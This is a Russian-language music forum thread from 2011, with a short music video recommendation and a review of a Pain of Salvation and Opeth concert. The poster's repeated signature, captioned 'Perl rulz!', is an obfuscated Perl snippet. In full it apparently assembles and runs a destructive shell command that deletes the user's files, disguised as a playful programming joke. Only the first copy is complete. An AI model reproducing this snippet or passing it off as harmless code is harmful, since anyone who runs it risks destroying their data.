Добавлено: Вт Мар 15, 2011 1:50 am Заголовок сообщения:
Three days grace - Animal I Have Become _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Вот эти ребята снимают очень качественные клипы с очень веселыми текстами и очень знаменитыми людьми. Здесь солист зэ строкес, например. _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Добавлено: Пт Дек 02, 2011 3:56 am Заголовок сообщения:
был сегодня на концерте Pain Of Salvation и Opeth, зная и у тех и у других пару песен, которые слышал у нас на радио
первые оставили такое странное впечатление, вроде играли и хорошо и даже отлично, но само отношение к публике было странным, на 2й же песне хотели чтобы публика прыгала, игнорируя то, что кто-то может быть по-другому наслаждается музыкой, а еще через пару песен вокалист назвал публику полным фейлом и сказал что "never seen such a lame crowd, sorry, but thats how it is", короче показалось такое отношение немного неуважительным, а из тех песен что я знаю не играли ни одной
вторые наоборот порадовали, вокалист постоянно болтал с публикой, причем не просто болтал, а шутил, причем смешно довольно, рассказывал про прошлое свое и группы, такой харизматичный очень хрен, улыбался, был рад тому что публика не всегда тупо орет, но и иногда молчит и слушает кивая, играли круто, было драм-соло минут на пять минимум, был акустик-сет из 3-4 песен, и из тех 2х песен которые я знал сыграли ту которая мне больше нравится, я даже почти кончил, ну а еще вышли на бис
еще кто-то в толпе крикнул "бритни спирс", а чувак со сцены говорит "а чо с ней не так? я б вдул"
короче весело довольно было и клуб был няшный, маленький, человек на 500 не больше, я стоял в 1 ряду у сцены
итого впечатление хорошее
из минусов могу отметить цену за бутылку воды без газа 5 евро (200 рублей), при цене билета в 30 евро, причем мою бутылку которая была с собой конечно же сказали выкинуть (а сами небось потом пошли и пустую бутылку сдали, говнари) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
новости от первоисточника, можно сказать, чувак на а1 работает(ал) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!